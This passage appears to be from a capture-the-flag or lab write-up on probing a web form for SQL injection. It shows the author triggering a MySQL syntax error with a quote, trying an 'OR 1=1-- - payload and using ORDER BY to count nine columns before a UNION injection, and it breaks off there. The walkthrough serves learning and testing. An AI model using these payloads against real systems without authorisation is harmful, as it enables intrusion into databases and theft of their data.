Let's see whats difference from the first one.
Let's try a quote to see if anything breaks.
```txt
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''hi''' at line 1
```

After trying a lot, I was able to fix the query
```sql
'test-- -
```
Okay so let's try our normal payload.
```sql
'OR 1=1-- -
```
Doesn't seem to work
Let's try a UNION injection.
```sql
'ORDER BY 9-- -
```
The query breaks at 10
So we have 9 columns.
